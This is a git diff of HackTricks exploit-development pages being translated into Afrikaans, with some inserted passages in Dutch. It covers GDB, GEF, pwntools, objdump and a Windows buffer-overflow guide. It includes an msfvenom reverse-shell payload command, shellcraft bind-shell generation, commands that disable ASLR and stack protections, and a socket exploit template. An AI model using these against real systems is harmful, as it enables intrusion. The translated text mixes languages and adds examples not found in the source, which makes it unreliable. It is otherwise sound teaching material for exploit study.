* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>

243
exploiting/tools/README.md
View file

@ -1,22 +1,19 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
# Metasploit
```
pattern_create.rb -l 3000 #Length
pattern_offset.rb -l 3000 -q 5f97d534 #Search offset
@ -24,72 +21,101 @@ nasm_shell.rb
nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
```
## Skulpe
## Shellcodes
'n Skulp is 'n klein stukkie uitvoerbare kode wat gebruik word in die uitbuiting van 'n sekuriteitskwesbaarheid om toegang tot 'n rekenaarstelsel te verkry. Dit is gewoonlik in masjienkode en word gebruik om 'n spesifieke taak uit te voer, soos die verkryging van beheer oor 'n stelsel of die uitvoering van 'n sekere funksie.
Skulpe word dikwels gebruik in die konteks van aanvalle soos bufferoorloopaanvalle, waar die aanvaller probeer om buite die grense van 'n toegewysde geheuegebied te skryf en sodoende die uitvoering van eie kode te bewerkstellig. Hierdie kode kan dan gebruik word om die aanvaller toegang tot die stelsel te gee, vertroulike inligting te steel of ander skadelike aktiwiteite uit te voer.
Daar is verskillende tipes skulpe, insluitend bindskulpe en omgekeerde skulpe. 'n Bindskulp is 'n stukkie kode wat 'n verbinding met die aanvaller se stelsel vestig en die beheer oor die aangevalle stelsel oorneem. 'n Omgekeerde skulp daarenteen maak dit vir die aanvaller moontlik om 'n verbinding met die aangevalle stelsel te maak en dit vanaf sy eie stelsel te beheer.
Die ontwikkeling van skulpe vereis 'n goeie begrip van masjienkode en die spesifieke stelsel waarop dit uitgevoer word. Dit is belangrik om te verseker dat die skulp korrek geoptimaliseer is vir die teikenstelsel en dat dit nie opgespoor of geblokkeer kan word deur sekuriteitsmaatreëls nie.
```
msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
```
# GDB
## Install
## Installeer
Om GDB te installeren, volg je de onderstaande stappen:
### Linux
1. Open een terminalvenster.
2. Voer het volgende commando in om GDB te installeren:
```bash
sudo apt-get install gdb
```
### macOS
1. Open een terminalvenster.
2. Voer het volgende commando in om GDB te installeren met Homebrew:
```bash
brew install gdb
```
### Windows
1. Download de GDB-installatiebestanden van de officiële website.
2. Voer het installatieprogramma uit en volg de instructies op het scherm.
Zodra de installatie is voltooid, kun je GDB gebruiken om programma's te debuggen en te analyseren.
```
apt-get install gdb
```
## Parameters
**-q** --> No show banner\
**-x \<file>** --> Auto-execute GDB instructions from here\
**-p \<pid>** --> Attach to process
**-q** --> Geen banner wysig\
**-x \<lêer>** --> Voer GDB instruksies outomaties uit vanaf hier\
**-p \<pid>** --> Koppel aan proses
### Instructions
### Instruksies
\> **disassemble main** --> Disassemble the function\
\> **disassemble main** --> Ontleed die funksie\
\> **disassemble 0x12345678**\
\> **set disassembly-flavor intel**\
\> **set follow-fork-mode child/parent** --> Follow created process\
\> **p system** --> Find the address of the system function\
\> **set follow-fork-mode child/parent** --> Volg geskep prosesse\
\> **p system** --> Vind die adres van die system funksie\
\> **help**\
\> **quit**
\> **br func** --> Add breakpoint to function\
\> **br func** --> Voeg breekpunt by funksie by\
\> **br \*func+23**\
\> **br \*0x12345678**\
**> del NUM** --> Delete that number of br\
\> **watch EXPRESSION** --> Break if the value changes
**> del NUM** --> Verwyder daardie aantal breekpunte\
\> **watch UITDRUKKING** --> Breek as die waarde verander
**> run** --> Execute\
**> start** --> Start and break in main\
\> **n/next** --> Execute next instruction (no inside)\
\> **s/step** --> Execute next instruction\
\> **c/continue** --> Continue until next breakpoint
**> run** --> Voer uit\
**> start** --> Begin en breek in main\
\> **n/next** --> Voer volgende instruksie uit (nie binne nie)\
\> **s/step** --> Voer volgende instruksie uit\
\> **c/continue** --> Gaan voort tot volgende breekpunt
\> **set $eip = 0x12345678** --> Change value of $eip\
\> **info functions** --> Info abount functions\
\> **info functions func** --> Info of the funtion\
\> **info registers** --> Value of the registers\
\> **bt** --> Stack\
\> **bt full** --> Detailed stack
\> **set $eip = 0x12345678** --> Verander waarde van $eip\
\> **info functions** --> Inligting oor funksies\
\> **info functions func** --> Inligting oor die funksie\
\> **info registers** --> Waarde van die registers\
\> **bt** --> Stapel\
\> **bt full** --> Gedetailleerde stapel
\> **print variable**\
\> **print 0x87654321 - 0x12345678** --> Caculate\
\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Shows content in octal/hexa/10/bin/instruction/ascii
\> **print veranderlike**\
\> **print 0x87654321 - 0x12345678** --> Bereken\
\> **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Wys inhoud in oktaal/heksadesimale/10/binêre/instruksie/ASCII
* **x/o 0xDir\_hex**
* **x/2x $eip** --> 2Words from EIP
* **x/2x $eip** --> 2 Woorde vanaf EIP
* **x/2x $eip -4** --> $eip - 4
* **x/8xb $eip** --> 8 bytes (b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes)
* **i r eip** --> Value of $eip
* **x/w pointer** --> Value of the pointer
* **x/s pointer** --> String pointed by the pointer
* **x/xw \&pointer** --> Address where the pointer is located
* **x/i $eip** —> Instructions of the EIP
* **x/8xb $eip** --> 8 byte (b-> byte, h-> 2 byte, w-> 4 byte, g-> 8 byte)
* **i r eip** --> Waarde van $eip
* **x/w pointer** --> Waarde van die wyser
* **x/s pointer** --> String wat deur die wyser aangedui word
* **x/xw \&pointer** --> Adres waar die wyser geleë is
* **x/i $eip** —> Instruksies van die EIP
## [GEF](https://github.com/hugsy/gef)
```bash
checksec #Check protections
p system #Find system function address
@ -109,34 +135,32 @@ pattern search $rsp #Search the offset given the content of $rsp
1- Put a bp after the function that overwrites the RIP and send a ppatern to ovwerwrite it
2- ef➤ i f
Stack level 0, frame at 0x7fffffffddd0:
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
rip = 0x400cd3; saved rip = 0x6261617762616176
called by frame at 0x7fffffffddd8
Arglist at 0x7fffffffdcf8, args:
Locals at 0x7fffffffdcf8, Previous frame's sp is 0x7fffffffddd0
Saved registers:
rbp at 0x7fffffffddc0, rip at 0x7fffffffddc8
gef➤ pattern search 0x6261617762616176
[+] Searching for '0x6261617762616176'
[+] Found at offset 184 (little-endian search) likely
```
## Truuks
## Tricks
### GDB dieselfde adresse
### GDB same addresses
While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
Terwyl jy GDB foutopsporing doen, sal GDB **effens verskillende adresse hê as die een wat deur die binêre lêer gebruik word wanneer dit uitgevoer word.** Jy kan GDB dieselfde adresse laat hê deur die volgende te doen:
* `unset env LINES`
* `unset env COLUMNS`
* `set env _=<path>` _Put the absolute path to the binary_
* Exploit the binary using the same absolute route
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
* `set env _=<pad>` _Plaas die absolute pad na die binêre lêer_
* Exploiteer die binêre lêer deur dieselfde absolute roete te gebruik
* `PWD` en `OLDPWD` moet dieselfde wees wanneer jy GDB gebruik en wanneer jy die binêre lêer uitbuit
### Backtrace to find functions called
When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called:
### Terugvoetspoor om opgeroepde funksies te vind
Wanneer jy 'n **staties gekoppelde binêre lêer** het, sal al die funksies aan die binêre lêer behoort (en nie aan eksterne biblioteke nie). In hierdie geval sal dit moeilik wees om **die vloei te identifiseer wat die binêre lêer volg om byvoorbeeld vir gebruikersinvoer te vra**.\
Jy kan hierdie vloei maklik identifiseer deur die binêre lêer met **gdb** te **hardloop** totdat jy gevra word vir invoer. Stop dit dan met **CTRL+C** en gebruik die **`bt`** (**terugvoetspoor**) bevel om die opgeroepde funksies te sien:
```
gef➤ bt
#0 0x00000000004498ae in ?? ()
@ -145,95 +169,88 @@ gef➤ bt
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
```
## GDB-bediener
## GDB server
`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine)
`gdbserver --multi 0.0.0.0:23947` (in IDA moet jy die absolute pad van die uitvoerbare lêer in die Linux-masjien en in die Windows-masjien invul)
# Ghidra
## Find stack offset
## Vind stapelverskuiwing
**Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\
For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\
_Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
**Ghidra** is baie nuttig om die **verskuiwing** vir 'n **buffer-oorvloei te vind danksy die inligting oor die posisie van die plaaslike veranderlikes.**\
Byvoorbeeld, in die voorbeeld hieronder, dui 'n buffer-oorvloei in `local_bc` aan dat jy 'n verskuiwing van `0xbc` benodig. Verder, as `local_10` 'n kanariekoek is, dui dit aan dat daar 'n verskuiwing van `0xac` is om dit vanaf `local_bc` te oorskryf.\
_Onthou dat die eerste 0x08 waar die RIP gestoor word, aan die RBP behoort._
![](<../../.gitbook/assets/image (616).png>)
# GCC
**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\
**-o** --> Output\
**-g** --> Save code (GDB will be able to see it)\
**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> To deactivate the ASLR in linux
**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Kompileer sonder beskerming\
**-o** --> Uitset\
**-g** --> Stoor kode (GDB sal dit kan sien)\
**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> Om die ASLR in Linux te deaktiveer
**To compile a shellcode:**\
**nasm -f elf assembly.asm** --> return a ".o"\
**ld assembly.o -o shellcodeout** --> Executable
**Om 'n skulpkode te kompileer:**\
**nasm -f elf assembly.asm** --> Gee 'n ".o"\
**ld assembly.o -o shellcodeout** --> Uitvoerbaar
# Objdump
**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\
**-Mintel** --> **Intel** syntax\
**-t** --> **Symbols** table\
**-D** --> **Disassemble all** (address of static variable)\
**-s -j .dtors** --> dtors section\
**-s -j .got** --> got section\
\-D -s -j .plt --> **plt** section **decompiled**\
**-TR** --> **Relocations**\
**ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\
**objdump -D ./exec | grep "VAR\_NAME"** --> Address or a static variable (those are stored in DATA section).
**-d** --> Ontbind uitvoerbare afdelings (sien opkode van 'n gekompileerde skulpkode, vind ROP-toestelle, vind funksie-adres...)\
**-Mintel** --> **Intel** sintaksis\
**-t** --> **Simbole**-tabel\
**-D** --> Ontbind alles (adres van statiese veranderlike)\
**-s -j .dtors** --> dtors-afdeling\
**-s -j .got** --> got-afdeling\
\-D -s -j .plt --> **plt**-afdeling **ontbind**\
**-TR** --> **Herskikkinge**\
**ojdump -t --dynamic-relo ./exec | grep puts** --> Adres van "puts" om in GOT te wysig\
**objdump -D ./exec | grep "VAR\_NAME"** --> Adres van 'n statiese veranderlike (hierdie word in DATA-afdeling gestoor).
# Core dumps
# Kernaflewerings
1. Run `ulimit -c unlimited` before starting my program
2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
1. Voer `ulimit -c unlimited` uit voordat jy my program begin
2. Voer `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` uit
3. sudo gdb --core=\<path/core> --quiet
# More
# Meer
**ldd executable | grep libc.so.6** --> Address (if ASLR, then this change every time)\
**for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> Loop to see if the address changes a lot\
**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset of "system"\
**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset of "/bin/sh"
**ldd uitvoerbare | grep libc.so.6** --> Adres (as ASLR, verander dit dan elke keer)\
**for i in \`seq 0 20\`; do ldd \<Ejecutable> | grep libc; done** --> Lus om te sien of die adres baie verander\
**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Verskuiwing van "system"\
**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Verskuiwing van "/bin/sh"
**strace executable** --> Functions called by the executable\
**rabin2 -i ejecutable -->** Address of all the functions
**strace uitvoerbare** --> Funksies wat deur die uitvoerbare aangeroep word\
**rabin2 -i ejecutable -->** Adres van al die funksies
# **Inmunity debugger**
```bash
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
```
# IDA
## Debugging in remote linux
Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary:
## Debugging in afgeleë Linux
Binêre lêers wat gebruik kan word om 'n binêre lêer binne 'n Linux te ontleed, kan binne die IDA-vouer gevind word. Om dit te doen, skuif die binêre lêer _linux\_server_ of _linux\_server64_ na die Linux-bediener en voer dit uit binne die vouer wat die binêre lêer bevat:
```
./linux_server64 -Ppass
```
Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
Stel dan die debugger in: Debugger (linux remote) --> Proses opsies...:
![](<../../.gitbook/assets/image (101).png>)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>

187
exploiting/tools/pwntools.md
View file

@ -1,133 +1,123 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
```
pip3 install pwntools
```
# Pwn asm
Get opcodes from line or file.
Kry opcodes van 'n lyn of lêer.
```
pwn asm "jmp esp"
pwn asm "jmp esp"
pwn asm -i <filepath>
```
**Kan kies:**
**Can select:**
* uitvoertipe (rou, heks, string, elf)
* uitvoerlêerkonteks (16,32,64,linux,windows...)
* vermyt byte (nuwe lyne, nul, 'n lys)
* kies 'n enkoder om die shellkode te debugeer deur gdb die uitvoer te laat loop
* output type (raw,hex,string,elf)
* output file context (16,32,64,linux,windows...)
* avoid bytes (new lines, null, a list)
* select encoder debug shellcode using gdb run the output
# **Pwn checksec**
Checksec script
# **Pwn checksec**
Checksec-skrip
```
pwn checksec <executable>
```
# Pwn constgrep
# Pwn cyclic
Get a pattern
# Pwn siklies
Kry 'n patroon
```
pwn cyclic 3000
pwn cyclic -l faad
```
**Kan kies:**
**Can select:**
* The used alphabet (lowercase chars by default)
* Length of uniq pattern (default 4)
* context (16,32,64,linux,windows...)
* Take the offset (-l)
* Die gebruikte alfabet (standaard kleinletters)
* Lengte van unieke patroon (standaard 4)
* Konteks (16,32,64,linux,windows...)
* Neem die offset (-l)
# Pwn debug
Attach GDB to a process
Hef GDB aan 'n proses aan
```
pwn debug --exec /bin/bash
pwn debug --pid 1234
pwn debug --process bash
```
**Kan kies:**
**Can select:**
* By executable, by name or by pid context (16,32,64,linux,windows...)
* gdbscript to execute
* sysrootpath
* Volgens uitvoerbare lêer, naam of pid konteks (16,32,64,linux,windows...)
* gdbskrip om uit te voer
* sysrootpad
# Pwn disablenx
Disable nx of a binary
Deaktiveer nx van 'n binêre lêer
```
pwn disablenx <filepath>
```
# Pwn disasm
Disas hex opcodes
Ontbind heksadesimale opcodes
```
pwn disasm ffe4
```
**Kan kies:**
**Can select:**
* context (16,32,64,linux,windows...)
* base addres
* color(default)/no color
* konteks (16,32,64,linux,windows...)
* basisadres
* kleur (standaard)/geen kleur
# Pwn elfdiff
Print differences between 2 fiels
Druk verskille tussen 2 lêers af
```
pwn elfdiff <file1> <file2>
```
# Grys hex
# Pwn hex
Get hexadecimal representation
Kry die heksadesimale voorstelling
```bash
pwn hex hola #Get hex of "hola" ascii
```
# Pwn phd
Get hexdump
Kry hexdump
```python
from pwn import *
# Verbind met die bediener
r = remote('example.com', 1337)
# Kry die hexdump van die ontvangsdata
data = r.recv()
hexdump(data)
```
Die `hexdump`-funksie in `pwntools` kan gebruik word om die ontvangsdata in 'n hexdump-formaat te vertoon. Hier is 'n voorbeeld van hoe om dit te gebruik. Eerstens, maak 'n verbind met die bediener deur die `remote`-funksie te gebruik en die bediener se adres en poortnommer te spesifiseer. Dan, ontvang die data van die bediener deur die `recv`-funksie te gebruik. Laastens, gebruik die `hexdump`-funksie om die data in 'n hexdump-formaat te vertoon.
```
pwn phd <file>
```
**Kan kies:**
**Can select:**
* Number of bytes to show
* Number of bytes per line highlight byte
* Skip bytes at beginning
* Aantal bytes om te wys
* Aantal bytes per lyn om te beklemtoon
* Slaan bytes aan die begin oor
# Pwn pwnstrip
@ -135,70 +125,59 @@ pwn phd <file>
# Pwn shellcraft
Get shellcodes
Kry skuldkodes
```
pwn shellcraft -l #List shellcodes
pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name
pwn shellcraft -f hex amd64.linux.sh #Create in C and run
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
pwn shellcraft -r amd64.linux.sh #Run to test. Get shell
pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
```
**Kan kies:**
**Can select:**
* shellkode en argumente vir die shellkode
* Uitlêer
* uitvoerformaat
* foutopsporing (heg dbg aan shellkode)
* voor (foutopsporingsval voor kode)
* na
* vermy gebruik van opcodes (verstek: nie nul en nuwe lyn)
* Voer die shellkode uit
* Kleur/geen kleur
* lys stelseloproepe
* lys moontlike shellkodes
* Genereer ELF as 'n gedeelde biblioteek
* shellcode and arguments for the shellcode
* Out file
* output format
* debug (attach dbg to shellcode)
* before (debug trap before code)
* after
* avoid using opcodes (default: not null and new line)
* Run the shellcode
* Color/no color
* list syscalls
* list possible shellcodes
* Generate ELF as a shared library
# Pwn template
Get a python template
# Pwn sjabloon
Kry 'n Python-sjabloon
```
pwn template
```
**Can select:** host, port, user, pass, path and quiet
**Kan kies:** gasheer, poort, gebruiker, wagwoord, pad en stil
# Pwn unhex
From hex to string
Van heks na string
```
pwn unhex 686f6c61
```
# Pwn opdatering
# Pwn update
To update pwntools
Om pwntools op te dateer
```
pwn update
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

201
exploiting/windows-exploiting-basic-guide-oscp-lvl.md
View file

@ -1,33 +1,59 @@
# Windows Exploiting (Basic Guide - OSCP lvl)
# Windows Exploiting (Basiese Gids - OSCP vlak)
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>
## **Start installing the SLMail service**
## **Begin met die installeer van die SLMail-diens**
## Restart SLMail service
Every time you need to **restart the service SLMail** you can do it using the windows console:
## Herlaai SLMail-diens
Elke keer as jy die diens SLMail wil **herlaai**, kan jy dit doen deur die Windows-konsole te gebruik:
```
net start slmail
```
![](<../.gitbook/assets/image (23) (1).png>)
## Very basic python exploit template
## Baie basiese Python uitbuitingsjabloon
```python
#!/usr/bin/env python3
import socket
# Verander hierdie waardes om die doelwit se IP-adres en poortnommer te spesifiseer
target_ip = "192.168.1.100"
target_port = 1337
# Skep 'n verbindingsobjek
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Verbind met die doelwit
s.connect((target_ip, target_port))
# Stuur 'n uitbuitingsstring na die doelwit
exploit_string = b"Exploit string goes here"
s.send(exploit_string)
# Ontvang die antwoord van die doelwit
response = s.recv(1024)
print(response.decode())
# Sluit die verbindingsobjek
s.close()
```
